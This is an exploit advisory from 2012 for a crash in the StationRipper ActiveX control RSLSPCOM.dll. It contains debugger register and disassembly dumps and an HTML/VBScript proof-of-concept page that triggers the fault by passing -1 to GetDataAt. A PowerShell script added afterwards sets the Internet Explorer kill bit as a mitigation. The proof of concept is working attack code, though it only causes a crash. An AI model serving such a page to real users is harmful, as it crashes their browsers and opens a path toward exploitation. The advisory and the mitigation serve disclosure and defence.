Exploit Title: stationripper ActiveX (RSLSPCOM.dll) BoF PoC
Date: July 19, 2012
Author: coolkaveh
coolkaveh () rocketmail com
https://twitter.com/coolkaveh
Vendor Homepage: www.stationripper.com
Version: 2.98.3/1
Tested on: Windows XP SP3
---------------------------------------------------------------------------------------
cheers to awesome hippie flaw hunter
---------------------------------------------------------------------------------------
Class SSLDataContainer
GUID: {E52990C2-7CED-4756-9B3B-6188A5B41704}
GetDataAt
Function GetDataAt (
ByVal lPos As Long ,
ByVal lHowMuch As Long
) As String
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EIP 003B1191
EAX 00000000
EBX 003BB3BC -> 003B3904
ECX 003D2120 -> BAADF00D
EDX 00000000
EDI FFFFFFFF
ESI 00000000
EBP 0013EDA4 -> 0013EDCC
ESP 0013ED64 -> 003BB3BC
Block Disassembly:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3B1181 MOV DL,AL
3B1183 AND DL,F
3B1186 SHL DL,2
3B1189 OR [EBP+13],DL
3B118C SHR AL,4
3B118F MOV DL,AL
3B1191 MOV AL,[EDI] <--- CRASH
3B1193 MOV BL,AL
3B1195 AND BL,3
3B1198 SHL BL,4
3B119B OR DL,BL
3B119D SHR AL,2
3B11A0 MOV [EBP+F],AL
3B11A3 MOV EAX,[EBP-4]
3B11A6 SUB [EBP-8],EAX
ArgDump:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EBP+8 003D2120 -> BAADF00D
EBP+12 FFFFFFFF
EBP+16 00000001
EBP+20 00000005
EBP+24 00000001
EBP+28 00000000
<html>
<body>
Exploit
<object classid='clsid:E52990C2-7CED-4756-9B3B-6188A5B41704' id='xpl'></object>
<script language='vbscript'>
' COMRaider-style template values (informational only; not used by the call below)
targetFile = "C:\Program Files\Ratajik Software\StationRipper\RSLSPCOM.dll"
prototype = "Function GetDataAt ( ByVal lPos As Long , ByVal lHowMuch As Long ) As String"
memberName = "GetDataAt"
progid = "SSLHIJACKCLIENTCOMLib.SSLDataContainer"
argCount = 2
' lPos = -1 is passed through unchecked (ArgDump: EBP+12 = FFFFFFFF) and
' lands in EDI; the read at 3B1191 (MOV AL,[EDI]) then faults
arg1 = -1
arg2 = 1
xpl.GetDataAt arg1, arg2
</script>
</body>
</html>
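Added mitigation example, not part of the original advisory: setting the Internet Explorer ActiveX kill bit for the SSLDataContainer CLSID listed above, so the browser refuses to instantiate the control until a fixed build is installed. It assumes an elevated PowerShell session; the "ActiveX Compatibility" registry path and the 0x400 "Compatibility Flags" value are Microsoft's documented kill-bit mechanism (KB 240797).

```powershell
# Added example (not from the advisory): kill-bit the vulnerable control.
# Requires an elevated PowerShell session. CLSID taken from the advisory.
$Clsid   = '{E52990C2-7CED-4756-9B3B-6188A5B41704}'
$KillBit = 0x400   # kill-bit value documented in Microsoft KB 240797

$Bases = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    # Present only on 64-bit Windows; skipped automatically on 32-bit hosts such as XP SP3
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Set-ActiveXKillBit {
    param([string]$Clsid, [string[]]$Bases)
    foreach ($Base in $Bases) {
        if (-not (Test-Path $Base)) { continue }
        $Key = Join-Path $Base $Clsid
        if (-not (Test-Path $Key)) { New-Item -Path $Key -Force | Out-Null }
        # OR the kill bit into any flags already set rather than overwriting them
        $Current = (Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
        $New = ([int]$Current) -bor $KillBit
        New-ItemProperty -Path $Key -Name 'Compatibility Flags' -PropertyType DWord -Value $New -Force | Out-Null
    }
}

function Test-ActiveXKillBit {
    # Returns a hashtable: registry key -> $true if the kill bit is set
    param([string]$Clsid, [string[]]$Bases)
    $Results = @{}
    foreach ($Base in $Bases) {
        $Key = Join-Path $Base $Clsid
        if (-not (Test-Path $Key)) { continue }
        $Flags = (Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
        $Results[$Key] = ((([int]$Flags) -band $KillBit) -ne 0)
    }
    return $Results
}

Set-ActiveXKillBit  -Clsid $Clsid -Bases $Bases
Test-ActiveXKillBit -Clsid $Clsid -Bases $Bases
```

After running, re-opening the PoC page in Internet Explorer should yield a blank object rather than the crash, and Test-ActiveXKillBit reports $true for each key it found.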